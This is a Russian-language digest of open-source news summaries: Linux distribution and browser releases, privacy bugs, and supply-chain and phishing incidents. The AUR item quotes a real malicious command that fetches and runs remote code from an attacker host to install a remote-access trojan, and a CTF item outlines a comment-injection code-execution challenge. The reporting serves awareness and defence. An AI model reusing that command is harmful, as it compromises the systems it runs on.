Разработчики дистрибутива AlmaLinux объявили о формировании пакетов с драйверами NVIDIA для веток AlmaLinux 9 и 10. Для установки также предложены пакеты с драйвером и стеком CUDA. Драйверы могут использоваться в конфигурациях с UEFI Secure Boot. Модули ядра из официального набора проприетарных драйверов от компании NVIDIA не могут быть загружены в режиме UEFI Secure Boot, так как они не заверены цифровой подписью дистрибутива. Данное ограничение удалось обойти благодаря использованию открытых компанией NVIDIA модулей ядра, которые уже задействованы по умолчанию в наборе драйверов NVIDIA для GPU, начиная с микроархитектуры Turing (GeForce GTX 1600 и RTX 2000). На базе открытых компанией NVIDIA компонентов … Читать далее AlmaLinux начал предоставлять пакеты с драйверами NVIDIA

Компания Lansweeper сообщила о повышении популярности Linux в сетях корпоративных клиентов, использующих платформу инвентаризации Lansweeper. Сканирование примерно 18.5 миллионов устройств показало увеличение доли Linux на корпоративных ноутбуках и ПК с 1.6% в январе до 1.9% в июне. Если рассматривать только новые устройства, появившиеся после 1 марта, то доля систем с Linux достигла значения 2.5%. По мнению технического директора компании Lansweeper, наблюдаемое изменение не походит на единичный всплеск, а скорее отражает постоянный экспоненциальный рост. Источник: http://www.opennet.ru/opennews/art.shtml?num=63691 Читать далее Рост популярности Linux в корпоративных сетях

Компания Google опубликовала релиз web-браузера Chrome 139. Одновременно доступен стабильный выпуск свободного проекта Chromium, выступающего основой Chrome. Браузер Chrome отличается от Chromium использованием логотипов Google, наличием системы отправки уведомлений в случае краха, модулями для воспроизведения защищённого от копирования видеоконтента (DRM), системой автоматической установки обновлений, постоянным включением Sandbox-изоляции, поставкой ключей к Google API и передачей RLZ-параметров при поиске. Для тех, кому необходимо больше времени на обновление, отдельно поддерживается ветка Extended Stable, сопровождаемая 8 недель. Следующий выпуск Chrome 140 запланирован на 2 сентября. Основные изменения в Chrome 139: Добавлена возможность использования AI-модели для формирования поисковых рекомендаций в адресной строке и на странице … Читать далее Выпуск web-браузера Chrome 139

Опубликован релиз Proxmox Virtual Environment 9.0, специализированного Linux-дистрибутива на базе Debian GNU/Linux, нацеленного на развертывание и обслуживание виртуальных серверов с использованием LXC и KVM, и способного выступить в роли замены таких продуктов, как VMware vSphere, Microsoft Hyper-V и Citrix Hypervisor. Размер установочного iso-образа 1.6 ГБ. Proxmox VE предоставляет средства для развёртывания полностью готовой системы виртуальных серверов промышленного уровня с управлением через web-интерфейс, рассчитанный на управление сотнями или даже тысячами виртуальных машин. Дистрибутив имеет встроенные инструменты для организации резервного копирования виртуальных окружений и доступную из коробки поддержку кластеризации, включая возможность миграции виртуальных окружений с одного узла на другой без остановки работы. … Читать далее Выпуск Proxmox VE 9.0, дистрибутива для организации работы виртуальных серверов

Доступен корректирующий выпуск Firefox 141.0.2, в котором устранено несколько проблем: Аварийное завершение при запуске на некоторых Linux-системах со старыми версиями проприетарных драйверов NVIDIA. Невозможность запуска на некоторых системах c библиотекой GTK, собранной без поддержки Wayland. Регрессивное изменение, приводившее к возникновению несовместимостей из-за возможности перемещения мышью объектов canvas в Аварийное завершение при инспектировании страниц с элементами iframe через инструменты для web-разработчиков. Незначительные сбои при отрисовке интерфейса пользователя (1, 2, 3, 4). Нарушение навигации при помощи клавиатуры из-за ухода фокуса из области с содержимым при клике на закреплённой вкладке. Кроме того, можно отметить новые возможности в ночных сборках Firefox: Поддержка предпросмотра свёрнутой … Читать далее Обновление Firefox 141.0.2

В представленном на прошлой неделе приложении Proton Authenticator, применяемом для аутентификации при помощи одноразовых паролей, выявлена проблем с конфиденциальностью — в сборках для мобильной платформы iOS забыли отключить детализированный отладочный лог, в котором открытым текстом сохранялись исходные секретные ключи для генерации одноразовых паролей. Подобный лог сводил на нет шифрование ключей и ограничение к ним доступа по PIN-коду или биометрической аутентификации. Проблема устранена в обновлении 1.1.1. В сборках для Android в лог сохранялся только идентификатор ключа, а не сам ключ. Источник: http://www.opennet.ru/opennews/art.shtml?num=63685 Читать далее В Proton Authenticator выявлено оседание секретных ключей в отладочном логе

В предлагаемом в репозитории Debian Testing (будущий релиз Debian 13) пакете StarDict, реализующем интерфейс для поиска в словарях, выявлена проблема с конфиденциальностью — в конфигурации по умолчанию приложение отправляет автоматически помещаемый в буфер обмена выделенный текст (x11 PRIMARY selection) на внешние серверы. Достаточно в любом приложении выделить отрывок текста и он сразу отправляется без шифрования по протоколу HTTP на китайские серверы online-словарей dict.youdao.com и dict.cn. Проблема проявляется только при работе в окружениях на базе протокола X11, при использовании Wayland по умолчанию применяется изоляция буфера обмена. Сопровождающий пакет StarDict в Debian ответил, что подобное поведение является штатным. По умолчанию в StarDict … Читать далее Пакет StarDict в Debian отправляет выделенный текст на внешние серверы

Представлен стабильный релиз прокси-сервера Squid 7.1, готовый для использования в рабочих системах (выпуски 7.0.x имели статус бета-версий). После придания ветке 7.x статуса стабильной, в ней отныне будут производиться только исправления уязвимостей и проблем со стабильностью, также допускается внесение небольших оптимизаций. Разработка новых возможностей будет производиться в новой экспериментальной ветке 8.0. Пользователям прошлой стабильной ветки 6.x рекомендуется спланировать переход на ветку 7.x. Основные новшества Squid 7: В ACL улучшена настройка перекрывающихся диапазонов IP-адресов и определения масок доменов. Удалена поддержка языка разметки ESI (Edge Side Includes). Убран доступ к Cache Manager с использованием схемы cache_object:// (оставлен только доступ по HTTP). Удалена утилита … Читать далее Стабильный релиз прокси-сервера Squid 7

Аарон Баллман (Aaron Ballman), главный сопровождающий компилятор Clang и участник команд разработки стандартов WG21 (C++) и WG14 (C), начал обсуждение добавления в компилятор Clang режима усиления безопасности. Новый режим позволит разом активировать набор опций для усиления защиты по аналогии с добавленным в GCC 14 флагом «-fhardened», при котором включаются опции «-D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -ftrivial-auto-var-init=zero -fPIE -pie -Wl,-z,relro,-z,now -fstack-protector-strong -fstack-clash-protection -fcf-protection=full». Отмечается, что в настоящее время ведётся работа по добавлению возможностей для усиления безопасности в стандарты C и C++, но этот процесс не быстрый, при том, что в Сlang уже доступны отдельные опции с реализацией дополнительных механизмов защиты. Реализуемые методы защиты часто … Читать далее В Clang намерены добавить режим усиленной безопасности

Опубликованы исходные тексты работ, победивших в двадцать восьмом конкурсе IOCCC (International Obfuscated C Code Contest), участникам которого предлагалось подготовить наиболее запутанный и трудноразбираемый код на языке Си. 28 конкурс проведён после четырёхлетнего перерыва и примечателен разрешением использовать кодировку UTF-8 в коде. Участвующие в конкурсе работы, с одной стороны, должны препятствовать анализу кода и пониманию сути решаемой задачи, но, с другой стороны, код должен быть интересен и чем-то примечателен (работы могут быть необычно оформлены или выделять неожиданные стороны языка Си). Размер исходного кода программы не должен превышать 4096 байт, а программа должна собираться и выполнять осмысленное действие. Победители: Помощник в решении … Читать далее Объявлены победители 28 конкурса по написанию запутанного кода на языке Си

Один из участников соревнования UIUCTF 2025, подробно разобрал, как ему удалось выполнить задание, требующее добиться выполнения своего кода на сервере, имея лишь возможность изменения содержимого текста комментария в коде. Участники могли отправить сетевой запрос к Python-скрипту, который создавал новый Python-скрипт cо случайными именем, добавлял поступившие от пользователя данные в текст комментария, вырезав символы «n» и «r», и запускал этот скрипт командой «python3 имя.py». Контролируя только содержимое комментария участник должен был извлечь строку из файла «/home/ctfuser/flag». Скрипт создавался следующим кодом: comment = input(«› «).replace(«n», «»).replace(«r», «») code = f»»»print(«hello world!») # This is a comment. Here’s another: # {comment} print(«Thanks for … Читать далее Достижение выполнения кода при контроле над текстом комментария в Python-скрипте

Опубликован релиз проекта FEX 2508, развивающего эмулятор для выполнения игр и приложений, собранных для архитектур x86 и x86-64, в Linux-окружении на системах с процессорами ARM64 (AArch64). Эмулятор FEX применяется проектом Asahi для запуска на системах с ARM-чипами Apple Silicon игр из каталога Steam, собранных для архитектуры x86_64. Код проекта написан на языке С++ с ассемблерными вставками и распространяется под лицензией MIT. Библиотеки, необходимые для запуска x86-приложений в ARM64-окружении, подключаются в форме overlay-прослойки с образом корневой ФС (rootfs), поставляемой в формате SquashFS. Подобная прослойка даёт возможность обойтись без создания отдельного chroot-окружения. Загрузка уже сформированных проектом образов rootfs производится утилитой FEXRootFSFetcher. Для … Читать далее Выпуск эмулятора FEX 2508, позволяющего запускать x86-программы на системах ARM64

Нейт Грэм (Nate Graham), разработчик, занимающийся контролем качества в проекте KDE, опубликовал очередной отчёт о разработке KDE. Среди недавних изменений в кодовой базе, формирующей будущий релиз KDE Plasma 6.5, намеченный на 16 октября: Добавлена поддержка автоматического переключения в ночное время на отдельно выбранную тёмную тему оформления. В конфирутаторе предоставлена возможность выбора глобальных тем оформления, которые будут доступны для переключения на странице быстрого изменения настроек (Quick Settings). На страницу быстрого изменения настроек также добавлена опция для автоматического переключения между дневной и ночной темами. Добавлена настройка для показа только светлых или только тёмных вариантов обоев рабочего стола. Также предоставлены опции для включения … Читать далее В KDE появилось автоматическое переключение между дневными и ночными темами оформления

Опубликован стабильный релиз интерфейса для упрощения настройки параметров сети — NetworkManager 1.54.0. Плагины для поддержки VPN (Libreswan, OpenConnect, Openswan, SSTP и др.) развиваются в рамках собственных циклов разработки. Основные новшества NetworkManager 1.54: Добавлена возможность прикреплять отдельные настройки перенаправления пакетов IPv4 к устройствам, используя опцию «ipv4.forwarding». Добавлена настройка «prefix-delegation», позволяющая использовать свойство «subnet-id» для выбора подсети на нижестоящем сетевом интерфейсе при использовании делегирования префиксов IPv6. В утилите nm-cloud-setup реализована поддержка настройки сетевых интерфейсов на baremetal-серверах в OCI (Oracle Cloud Infrastructure). При активации соединений на базе VPN WireGuard реализовано добавление правил в пакетный фильтр, исключающих отбрасывание входящих пакетов ядром из-за rp_filter (Reverse … Читать далее Релиз сетевого конфигуратора NetworkManager 1.54.0

Компания Mozilla сообщила о выявлении фишинг-атаки на разработчиков дополнений к Firefox. Как и в случае недавних атак на сопровождающих пакеты в репозиториях PyPI и NPM, участники каталога дополнений AMO (addons.mozilla.org) стали получать письма, стилизованные под уведомления от Mozilla и информирующие о необходимости обновления информации в профиле для продолжения доступа к возможностям каталога. Ссылки на форму входа в письме вели на подставной сайт, проксирующий запросы к основному каталогу addons.mozilla.org. Отмечается, что корректными доменами для сервисов Mozilla являются только mozilla.org и firefox.com, на любых других доменах учётные данные вводить не следует. Фишинговый домен не уточняется, но получившие письмо разработчики упоминают использование в … Читать далее Mozilla предупредила о фишинг-атаке на разработчиков дополнений к Firefox

В репозитории AUR (Arch User Repository), применяемом в Arch Linux для распространения пакетов от сторонних разработчиков, продолжилась публикация вредоносного кода, интегрированного в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад вредоносным пакетам firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе. В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl https://segs.lol/9wUb1Z)»‘, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и … Читать далее В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов

Продолжается развитие проекта FPDoom, который позволяет запустить классический Doom, его дополнения и другие портированные игры на очень распространённом на дешёвых кнопочных телефонах чипе Spreadtrum SC6531 и его модификациях. Чипсету более десяти лет, но телефоны на нём выпускаются до сих пор. В списке протестированных присутствуют 62 модели телефонов. Поддерживаются даже телефоны с монохромном экраном и разрешением 128×64, 96×68 и 64×48 пикселей. С прошлой новости вышло три обновления: 1.20241116: портирован Snes9x — эмулятор SNES. За счёт использования виртуальной памяти можно загружать игры, чей ROM больше памяти телефона (реализовано как маппинг памяти в операционных системах). 1.20250615: портирован Chocolate Doom (в который входят игры … Читать далее Выпуск проекта FPDoom 1.20250728, развивающего порты Doom и других игр для кнопочных телефонов

Швейцарская компания Proton AG, развивающая сервисы Proton Mail, Proton Drive и Proton VPN, представила открытое приложение Proton Authenticator, предназначенное для аутентификации при помощи одноразовых паролей с ограниченным сроком действия, генерируемых при помощи алгоритма TOTP (Time-based One-Time Password). Proton Authenticator может применяться как более функциональная замена проприетарным аутентификаторам, таким как Google Authenticator, Microsoft Authenticator, Authy и Duo, а также в качестве альтернативы открытым проектам FreeOTP и oathtool. Код Proton Authenticator распространяется под лицензией GPLv3. Доступны как мобильные приложения для Android и iOS, так и настольные программы для Linux, macOS и Windows. При разработке в зависимости от платформы применяются языки Kotlin, Swift … Читать далее Представлен Proton Authenticator, генератор одноразовых паролей для двухфакторной аутентификации

Проект KDE начал публикацию тестовых сборок собственного дистрибутива KDE Linux — KDE Linux Testing Edition, а также разместил на основном сайте kde.org страницу, посвящённую дистрибутиву. Для установки доступны системные образы (5.2 ГБ) для создания загрузочных USB-накопителей, работающих в Live-режиме. KDE Linux позиционируется как эталонная реализация Linux-дистрибутива для рабочего стола и приложений KDE, оптимально сочетаемая с технологиями KDE и развиваемая без посредников разработчиками KDE. Редакция KDE Linux Testing Edition основывается на master-ветке в Git и рассчитана на тестирование, контроль качества и отслеживание процесса разработки. Сборки будут обновляться ежедневно и отражать текущее состояние разработки компонентов проекта. Основной целевой аудиторией KDE Linux Testing … Читать далее Проект KDE опубликовал дистрибутив KDE Linux Testing Edition

Доступен выпуск 4MLinux 49.0, минималистичного пользовательского дистрибутива, не являющегося ответвлением от других проектов и использующего графическое окружение на базе оконного менеджера JWM. 4MLinux может использоваться как в роли Live-окружения для воспроизведения мультимедийных файлов и решения пользовательских задач, так и в качестве системы для восстановления после сбоев и платформы для запуска мини-серверов. Для загрузки подготовлены live-образ (x86_64, 1.7 ГБ) с графическим окружением и урезанная консольная сборка (x86_64, 16.2 МБ). В новой версии: Обновлены версии пакетов: ядро Linux 6.12.39, BusyBox 1.37.0, Mesa 25.1.0, Wine 10.11, Perl 5.40.2, Python 2.7.18, Python 3.13.3, Ruby 3.4.3. Обновлены пользовательские приложения: LibreOffice 25.2, AbiWord 3.0.6, GIMP 3.1.2, … Читать далее Выпуск дистрибутива 4MLinux 49.0

Раскрыта информация о жертвах фишинга, о котором на днях предупреждали администраторы репозитория Python-пакетов PyPI (Python Package Index). В результате рассылки сообщений с уведомлением о необходимости подтвердить свой email, которые ссылались на поддельный сайт pypj.org (буква «j» вместо «i»), удалось захватить учётные записи 4 сопровождающих. В итоге злоумышленниками были сгенерированы два токена для доступа к API и опубликовано два релиза проекта num2words (0.5.15 и 0.5.16), содержащих вредоносный код. Модуль num2words, который имеет более 3 млн загрузок в месяц, предоставляет функции для преобразования чисел в текстовое представление. Вредоносные релизы num2words были удалены администраторами PyPI через час после публикации. Для обхода защиты учётной … Читать далее Перехвачены 4 учётные записи в PyPI и выпущены вредоносные релизы num2words